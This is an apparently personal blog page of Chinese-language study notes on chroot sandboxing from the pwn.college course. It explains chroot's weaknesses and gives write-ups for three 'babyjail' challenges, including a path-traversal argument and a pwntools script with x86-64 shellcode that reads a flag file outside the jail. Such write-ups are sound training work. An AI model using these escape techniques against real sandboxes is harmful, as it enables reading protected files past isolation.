<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 6.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/wiki/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/wiki/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/wiki/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/wiki/images/logo.svg" color="#222">

<link rel="stylesheet" href="/wiki/css/main.css">

<link rel="stylesheet" href="//fonts.googleapis.com/css?family=Roboto:300,300italic,400,400italic,700,700italic|sans-serif:300,300italic,400,400italic,700,700italic|'Noto+Sans+SC':300,300italic,400,400italic,700,700italic|Fira+Code:300,300italic,400,400italic,700,700italic&display=swap&subset=latin,latin-ext">

<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.14.0/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/pace-js@1.0.2/themes/blue/pace-theme-minimal.css">
  <script src="//cdn.jsdelivr.net/npm/pace-js@1.0.2/pace.min.js"></script>

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"w3b5h3ll.github.io","root":"/wiki/","scheme":"Muse","version":"8.0.0","exturl":false,"sidebar":{"position":"right","display":"post","padding":18,"offset":12},"copycode":true,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":true,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"buttons","active":"valine","storage":true,"lazyload":false,"nav":null,"activeClass":"valine"},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"},"path":"search.xml","localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false}};
  </script>

  <meta name="description" content="Filesystem Isolationchroot jail  曾是实际中使用的沙箱模块  no syscall filtering or other isolation，功能较简单  previously open resources   $ sudo chroot &#x2F;tmp &#x2F;bin&#x2F;bash[sudo] password for w3b5h3ll: chroot: failed to ru">
<meta property="og:type" content="article">
<meta property="og:title" content="PwnCollege-Sandboxing">
<meta property="og:url" content="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/index.html">
<meta property="og:site_name" content="尘埃落定的WIKI">
<meta property="og:description" content="Filesystem Isolationchroot jail  曾是实际中使用的沙箱模块  no syscall filtering or other isolation，功能较简单  previously open resources   $ sudo chroot &#x2F;tmp &#x2F;bin&#x2F;bash[sudo] password for w3b5h3ll: chroot: failed to ru">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://w3b5h3ll.github.io/wiki//w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/2023-12-24-23-13-24-image.png">
<meta property="article:published_time" content="2024-05-09T15:52:51.981Z">
<meta property="article:modified_time" content="2024-01-09T08:20:29.000Z">
<meta property="article:author" content="w3b5h3ll">
<meta property="article:tag" content="System Security">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://w3b5h3ll.github.io/wiki//w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/2023-12-24-23-13-24-image.png">


<link rel="canonical" href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>PwnCollege-Sandboxing | 尘埃落定的WIKI</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/wiki/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">尘埃落定的WIKI</h1>
      <i class="logo-line"></i>
    </a>
      <p class="site-subtitle" itemprop="description">嘩啦啦啦啦 天在下雨 嘩啦啦啦啦 雲在哭泣 ......</p>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/wiki/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/wiki/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off" maxlength="80"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div class="search-result-container no-result">
  <div class="search-result-icon">
    <i class="fa fa-spinner fa-pulse fa-5x"></i>
  </div>
</div>

    </div>
  </div>

</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <section class="post-toc-wrap sidebar-panel">
          <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#Filesystem-Isolation"><span class="nav-number">1.</span> <span class="nav-text">Filesystem Isolation</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#chroot-pitfalls"><span class="nav-number">1.1.</span> <span class="nav-text">chroot pitfalls</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#Challenges"><span class="nav-number">2.</span> <span class="nav-text">Challenges</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#level1"><span class="nav-number">2.1.</span> <span class="nav-text">level1</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level2"><span class="nav-number">2.2.</span> <span class="nav-text">level2</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#level3"><span class="nav-number">2.3.</span> <span class="nav-text">level3</span></a></li></ol></li></ol></div>
      </section>
      <!--/noindex-->

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-author animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">w3b5h3ll</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/wiki/archives">
          <span class="site-state-item-count">8</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/wiki/tags/">
          
        <span class="site-state-item-count">2</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </section>
        <div class="back-to-top animated">
          <i class="fa fa-arrow-up"></i>
          <span>0%</span>
        </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="reading-progress-bar"></div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/wiki/images/avatar.gif">
      <meta itemprop="name" content="w3b5h3ll">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="尘埃落定的WIKI">
    </span>

    
    
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          PwnCollege-Sandboxing
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2024-05-09 23:52:51" itemprop="dateCreated datePublished" datetime="2024-05-09T23:52:51+08:00">2024-05-09</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2024-01-09 16:20:29" itemprop="dateModified" datetime="2024-01-09T16:20:29+08:00">2024-01-09</time>
      </span>

  
    <span id="/wiki/2024/05/09/PwnCollege-Sandboxing/" class="post-meta-item leancloud_visitors" data-flag-title="PwnCollege-Sandboxing" title="阅读次数">
      <span class="post-meta-item-icon">
        <i class="far fa-eye"></i>
      </span>
      <span class="post-meta-item-text">阅读次数：</span>
      <span class="leancloud-visitors-count"></span>
    </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="far fa-comment"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/wiki/2024/05/09/PwnCollege-Sandboxing/#valine-comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/wiki/2024/05/09/PwnCollege-Sandboxing/" itemprop="commentCount"></span>
    </a>
  </span>
  
  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h2 id="Filesystem-Isolation"><a href="#Filesystem-Isolation" class="headerlink" title="Filesystem Isolation"></a>Filesystem Isolation</h2><p>chroot jail</p>
<ul>
<li><p>曾是实际中使用的沙箱模块</p>
</li>
<li><p>no syscall filtering or other isolation，功能较简单</p>
</li>
<li><p><font color="red">previously open resources</font></p>
</li>
</ul>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">$ sudo <span class="built_in">chroot</span> /tmp /bin/bash</span><br><span class="line">[sudo] password <span class="keyword">for</span> w3b5h3ll: </span><br><span class="line"><span class="built_in">chroot</span>: failed to run <span class="built_in">command</span> ‘/bin/bash’: No such file or directory</span><br><span class="line">(base) </span><br><span class="line"><span class="comment"># w3b5h3ll @ ubuntu22 in ~/Desktop/Doing [23:08:49] C:127</span></span><br><span class="line">$ <span class="built_in">ls</span> /bin/bash</span><br><span class="line">/bin/bash</span><br></pre></td></tr></table></figure>

<p><img src="/wiki//w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/2023-12-24-23-13-24-image.png"></p>
<p><code>chroot</code>不会影响已打开资源，不会改变当前目录</p>
<figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="type">int</span> <span class="title function_">main</span><span class="params">()</span></span><br><span class="line">&#123;</span><br><span class="line">    chroot(<span class="string">&quot;/tmp/jail&quot;</span>);</span><br><span class="line">    <span class="comment">// chdir(&quot;/&quot;);</span></span><br><span class="line">    execl(<span class="string">&quot;/busybox&quot;</span>, <span class="string">&quot;sh&quot;</span>, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>如下</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">(unknown) <span class="comment"># ls .</span></span><br><span class="line"><span class="built_in">chroot</span>    chroot.c</span><br><span class="line">sh: getcwd: No such file or directory</span><br><span class="line">(unknown) <span class="comment"># ls /</span></span><br><span class="line">busybox</span><br><span class="line">sh: getcwd: No such file or directory</span><br><span class="line">(unknown) <span class="comment"># ls tmp/jail</span></span><br><span class="line"><span class="built_in">ls</span>: tmp/jail: No such file or directory</span><br><span class="line">sh: getcwd: No such file or directory</span><br><span class="line">(unknown) <span class="comment"># ls /tmp</span></span><br><span class="line"><span class="built_in">ls</span>: /tmp: No such file or directory</span><br><span class="line">sh: getcwd: No such file or directory</span><br><span class="line">(unknown) <span class="comment"># ls ../../../tmp/jail/</span></span><br><span class="line">busybox</span><br><span class="line">sh: getcwd: No such file or directory</span><br></pre></td></tr></table></figure>

<h3 id="chroot-pitfalls"><a href="#chroot-pitfalls" class="headerlink" title="chroot pitfalls"></a>chroot pitfalls</h3><p>0x01 previously open resources</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line"><span class="comment"># 在指定目录中执行相关操作</span></span><br><span class="line">int openat(int dirfd, char *pathname, int flags)</span><br><span class="line">int execveat(int dirfd, char *pathname, char **argv, char **envp, int flags)</span><br><span class="line">...</span><br><span class="line">*at();</span><br></pre></td></tr></table></figure>

<p>Also misssing other forms of isolation:</p>
<ul>
<li><p>PID</p>
</li>
<li><p>network</p>
</li>
<li><p>IPC</p>
</li>
</ul>
<p>更加先进的工具</p>
<ul>
<li><p>cgroups</p>
</li>
<li><p>namespaces</p>
</li>
<li><p>seccomp</p>
</li>
</ul>
<h2 id="Challenges"><a href="#Challenges" class="headerlink" title="Challenges"></a>Challenges</h2><h3 id="level1"><a href="#level1" class="headerlink" title="level1"></a>level1</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line">setvbuf(<span class="built_in">stdin</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">0</span>);</span><br><span class="line">setvbuf(<span class="built_in">stdout</span>, <span class="literal">NULL</span>, _IONBF, <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;This challenge will chroot into a jail in /tmp/jail-XXXXXX. You will be able to easily read a fake flag file inside this&quot;</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;jail, not the real flag file outside of it. If you want the real flag, you must escape.\n&quot;</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;The only thing you can do in this challenge is read out one single file, as specified by the first argument to the&quot;</span>);</span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;program (argv[1]).\n&quot;</span>);</span><br><span class="line"></span><br><span class="line">assert(argc &gt; <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">char</span> jail_path[] = <span class="string">&quot;/tmp/jail-XXXXXX&quot;</span>;</span><br><span class="line">assert(mkdtemp(jail_path) != <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Creating a jail at `%s`.\n&quot;</span>, jail_path);</span><br><span class="line"></span><br><span class="line">assert(chroot(jail_path) == <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> fffd = open(<span class="string">&quot;/flag&quot;</span>, O_WRONLY | O_CREAT);</span><br><span class="line">write(fffd, <span class="string">&quot;FLAG&#123;FAKE&#125;&quot;</span>, <span class="number">10</span>);</span><br><span class="line">close(fffd);</span><br><span class="line"></span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Sending the file at `%s` to stdout.\n&quot;</span>, argv[<span class="number">1</span>]);</span><br><span class="line">sendfile(<span class="number">1</span>, open(argv[<span class="number">1</span>], <span class="number">0</span>), <span class="number">0</span>, <span class="number">128</span>);</span><br></pre></td></tr></table></figure>

<p><code>chroot</code>只是改变了<code>/</code>，利用相对路径进行路径穿越</p>
<figure class="highlight bash"><table><tr><td class="code"><pre><span class="line">FLAG&#123;FAKE&#125;hacker@sandboxing-level-1:~$ /challenge/babyjail_level1 ../../..//flag</span><br><span class="line"><span class="comment">###</span></span><br><span class="line"><span class="comment">### Welcome to /challenge/babyjail_level1!</span></span><br><span class="line"><span class="comment">###</span></span><br><span class="line"></span><br><span class="line">This challenge will <span class="built_in">chroot</span> into a jail <span class="keyword">in</span> /tmp/jail-XXXXXX. You will be able to easily <span class="built_in">read</span> a fake flag file inside this</span><br><span class="line">jail, not the real flag file outside of it. If you want the real flag, you must escape.</span><br><span class="line"></span><br><span class="line">The only thing you can <span class="keyword">do</span> <span class="keyword">in</span> this challenge is <span class="built_in">read</span> out one single file, as specified by the first argument to the</span><br><span class="line">program (argv[1]).</span><br><span class="line"></span><br><span class="line">Creating a jail at `/tmp/jail-mwvxp7`.</span><br><span class="line">Sending the file at `../../..//flag` to stdout.</span><br><span class="line">pwn.college&#123;862JxWRgpdvPUfPoezc4ZwqrhEc.QXxMjMsMjM0YzW&#125;</span><br><span class="line">hacker@sandboxing-level-1:~$ </span><br></pre></td></tr></table></figure>

<h3 id="level2"><a href="#level2" class="headerlink" title="level2"></a>level2</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Checking to make sure you&#x27;re not trying to open the flag.\n&quot;</span>);</span><br><span class="line">assert(<span class="built_in">strstr</span>(argv[<span class="number">1</span>], <span class="string">&quot;flag&quot;</span>) == <span class="literal">NULL</span>);</span><br><span class="line"></span><br><span class="line"><span class="comment">// shellcode</span></span><br><span class="line"><span class="type">void</span> *shellcode = mmap((<span class="type">void</span> *)<span class="number">0x1337000</span>, <span class="number">0x1000</span>, PROT_READ|PROT_WRITE|PROT_EXEC, MAP_PRIVATE|MAP_ANON, <span class="number">0</span>, <span class="number">0</span>);</span><br><span class="line">assert(shellcode == (<span class="type">void</span> *)<span class="number">0x1337000</span>);</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">&quot;Mapped 0x1000 bytes for shellcode at %p!\n&quot;</span>, shellcode);</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Reading 0x1000 bytes of shellcode from stdin.\n&quot;</span>);</span><br><span class="line"><span class="type">int</span> shellcode_size = read(<span class="number">0</span>, shellcode, <span class="number">0x1000</span>);</span><br></pre></td></tr></table></figure>

<p>实现</p>
<ul>
<li><p>&#x2F;tmp创建指向<code>/flag</code>的软连接<code>/tmp/flag</code></p>
</li>
<li><p>shellcode读取<code>../flag</code></p>
</li>
</ul>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">bin_path = <span class="string">&#x27;/challenge/babyjail_level2&#x27;</span></span><br><span class="line">bin_args = <span class="string">&#x27;test&#x27;</span></span><br><span class="line"><span class="comment"># elf = ELF(&#x27;/challenge/babyjail_level2&#x27;)</span></span><br><span class="line">context.arch = <span class="string">&#x27;amd64&#x27;</span></span><br><span class="line"></span><br><span class="line">shellcode = asm(<span class="string">&#x27;&#x27;&#x27;</span></span><br><span class="line"><span class="string">    mov rax, 2</span></span><br><span class="line"><span class="string">    mov rbx, 0x00007878782f2e2e</span></span><br><span class="line"><span class="string">    push rbx</span></span><br><span class="line"><span class="string">    mov rdi, rsp</span></span><br><span class="line"><span class="string">    mov rsi, 0</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    mov rdi, 1</span></span><br><span class="line"><span class="string">    mov rsi, rax</span></span><br><span class="line"><span class="string">    mov rdx, 0</span></span><br><span class="line"><span class="string">    mov r10, 512</span></span><br><span class="line"><span class="string">    mov rax, 40</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">    mov rax, 60</span></span><br><span class="line"><span class="string">    syscall</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">&#x27;&#x27;&#x27;</span>)</span><br><span class="line"></span><br><span class="line">p = process([bin_path, bin_args])</span><br><span class="line">p.sendline(shellcode)</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure>

<h3 id="level3"><a href="#level3" class="headerlink" title="level3"></a>level3</h3><figure class="highlight c"><table><tr><td class="code"><pre><span class="line">assert(chroot(jail_path) == <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="built_in">puts</span>(<span class="string">&quot;Moving the current working directory into the jail.\n&quot;</span>);</span><br><span class="line">assert(chdir(<span class="string">&quot;/&quot;</span>) == <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"><span class="type">int</span> fffd = open(<span class="string">&quot;/flag&quot;</span>, O_WRONLY | O_CREAT);</span><br><span class="line">write(fffd, <span class="string">&quot;FLAG&#123;FAKE&#125;&quot;</span>, <span class="number">10</span>);</span><br><span class="line">close(fffd);</span><br></pre></td></tr></table></figure>

    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>w3b5h3ll
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/" title="PwnCollege-Sandboxing">https://w3b5h3ll.github.io/wiki/2024/05/09/PwnCollege-Sandboxing/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/wiki/tags/System-Security/" rel="tag"># System Security</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/wiki/2024/05/09/PwnCollege-RaceConditions/" rel="prev" title="">
                  <i class="fa fa-chevron-left"></i> 
                </a>
            </div>
            <div class="post-nav-item">
            </div>
          </div>
    </footer>
  </article>
  
  
  



      
    <div class="comments" id="valine-comments"></div>

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">w3b5h3ll</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/muse/" class="theme-link" rel="noopener" target="_blank">NexT.Muse</a> 强力驱动
  </div>

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.0/lib/anime.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/jquery@3.5.1/dist/jquery.min.js"></script>
  <script src="//cdn.jsdelivr.net/npm/@fancyapps/fancybox@3.5.7/dist/jquery.fancybox.min.js"></script>
<script src="/wiki/js/utils.js"></script><script src="/wiki/js/motion.js"></script><script src="/wiki/js/schemes/muse.js"></script><script src="/wiki/js/next-boot.js"></script>

  




  <script src="/wiki/js/local-search.js"></script>










<script>
if (document.querySelectorAll('.mermaid').length) {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/mermaid@8.7.0/dist/mermaid.min.js', () => {
    mermaid.init({
      theme    : 'forest',
      logLevel : 3,
      flowchart: { curve     : 'linear' },
      gantt    : { axisFormat: '%m/%d/%Y' },
      sequence : { actorMargin: 50 }
    }, '.mermaid');
  }, window.mermaid);
}
</script>


  








  

  

  
<script>
NexT.utils.loadComments('#valine-comments', () => {
  NexT.utils.getScript('//cdn.jsdelivr.net/npm/valine@1.4.14/dist/Valine.min.js', () => {
    new Valine(Object.assign({
      el  : '#valine-comments',
      path: "/wiki/2024/05/09/PwnCollege-Sandboxing/",
    }, {"enable":true,"appId":"htEoF16VKxb4kS3oG0LReLBz-MdYXbMMI","appKey":"P7rwEt21RTK0B11XxuTwjss2","serverURLs":"https://hteof16v.api.lncldglobal.com","placeholder":"Just go go","avatar":"mm","meta":["nick","mail","link"],"pageSize":10,"visitor":true,"comment_count":true,"recordIP":false}
    ));
  }, window.Valine);
});
</script>

</body>
</html>
